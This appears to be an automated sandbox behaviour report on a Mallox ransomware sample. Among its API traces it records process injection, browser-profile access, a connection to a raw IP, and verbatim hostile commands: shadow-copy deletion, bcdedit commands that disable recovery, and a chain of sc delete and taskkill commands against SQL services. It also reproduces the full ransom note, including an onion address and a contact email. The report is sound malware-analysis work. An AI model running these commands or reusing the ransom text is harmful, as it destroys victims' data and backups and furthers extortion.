NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (3 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW March 11, 2023, 10:28 a.m.	total_number_of_free_bytes: 9935609856 free_bytes_available: 9935609856 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW March 11, 2023, 10:28 a.m.	total_number_of_free_bytes: 9931825152 free_bytes_available: 0 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW March 11, 2023, 10:28 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: D:\ total_number_of_bytes: 0		0

Steals private information from local Internet browsers (50 out of 129 events)

file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Preferences
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\History
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates a shortcut to an executable file (16 events)

file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk

Creates a suspicious process (8 events)

cmdline	cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
cmdline	cmd.exe /c bcdedit /set {current} recoveryenabled no
cmdline	"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	powershell -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
cmdline	"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 11, 2023, 10:28 a.m.	show_type: 0 filepath_r: powershell parameters: -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA== filepath: powershell	1	1
ShellExecuteExW March 11, 2023, 10:28 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\vssadmin.exe parameters: delete shadows /all /quiet filepath: C:\Windows\sysnative\vssadmin.exe	1	1
ShellExecuteExW March 11, 2023, 10:28 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe filepath: cmd.exe	1	1
ShellExecuteExW March 11, 2023, 10:28 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c bcdedit /set {current} bootstatuspolicy ignoreallfailures filepath: cmd.exe	1	1
ShellExecuteExW March 11, 2023, 10:28 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c bcdedit /set {current} recoveryenabled no filepath: cmd.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (17 events)

Time & API	Arguments	Status	Return
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: taskhost.exe process_identifier: 1884	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: SearchProtocolHost.exe process_identifier: 1704	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: SearchFilterHost.exe process_identifier: 1792	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: svchost.exe process_identifier: 2352	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: mscorsvw.exe process_identifier: 2380	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: mscorsvw.exe process_identifier: 2428	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: sppsvc.exe process_identifier: 2472	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: dllhost.exe process_identifier: 2680	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: a-Yfgvvxyduvu.exe process_identifier: 2744	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: vssadmin.exe process_identifier: 2864	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: cmd.exe process_identifier: 2932	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: cmd.exe process_identifier: 2940	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: conhost.exe process_identifier: 2968	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: conhost.exe process_identifier: 3032	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: cmd.exe process_identifier: 3060	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: conhost.exe process_identifier: 2088	1	1
Process32NextW March 11, 2023, 10:28 a.m.	snapshot_handle: 0x00000260 process_name: inject-x86.exe process_identifier: 880	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 11, 2023, 10:28 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 11, 2023, 10:28 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 11, 2023, 10:28 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 11, 2023, 10:28 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW March 11, 2023, 10:28 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 11, 2023, 10:21 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://www.torproject.org/download/

Yara rule detected in process memory (15 events)

description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications smtp	rule	Network_SMTP_dotNet
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	sc delete "MSSQLFDLauncher"

Communicates with host for which no DNS query was performed (1 event)

host

80.66.75.36

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 2744 region_size: 176128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000524	1	0	0

Attempts to identify installed AV products by installation directory (6 events)

file	C:\Users\All Users\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt
file	C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt
file	C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt
file	C:\Documents and Settings\All Users\Microsoft\Microsoft Antimalware\FILE RECOVERY.txt
file	C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\Support\FILE RECOVERY.txt
file	C:\Users\All Users\Microsoft\Microsoft Antimalware\Network Inspection System\FILE RECOVERY.txt

Creates known Dyreza Banking Trojan files, registry keys and/or mutexes (1 event)

file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\CP_Common\FILE RECOVERY.txt

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $l!aâ(@±(@±(@±M&°"@±M& °±@±* °@±°9@±°<@±M&°)@±M&°;@±M&°;@±(@±@±\+°%@±\+ð±)@±\+ °)@±Rich(@±PEL±WÍcàrün@°@ÜÈà¸8Ü8@Ì.textpr `.rdatav@@.dataHK0@À.rsrcà@@.reloc¸@B base_address: 0x00400000 process_identifier: 2744 process_handle: 0x00000524	1	1
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: 0 H`}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00428000 process_identifier: 2744 process_handle: 0x00000524	1	1
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2744 process_handle: 0x00000524	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory March 11, 2023, 10:28 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $l!aâ(@±(@±(@±M&°"@±M& °±@±* °@±°9@±°<@±M&°)@±M&°;@±M&°;@±(@±@±\+°%@±\+ð±)@±\+ °)@±Rich(@±PEL±WÍcàrün@°@ÜÈà¸8Ü8@Ì.textpr `.rdatav@@.dataHK0@À.rsrcà@@.reloc¸@B base_address: 0x00400000 process_identifier: 2744 process_handle: 0x00000524	1	1	0

Modifies boot configuration settings (2 events)

command	"c:\windows\system32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
command	"c:\windows\system32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1836 called NtSetContextThread to modify thread in remote process 2744
NtSetContextThread March 11, 2023, 10:28 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4231022 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000039c process_identifier: 2744	1	0	0

url	https://www.torproject.org/download/

Writes a potential ransom message to disk (50 out of 2777 events)

Time & API	Arguments	Status
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 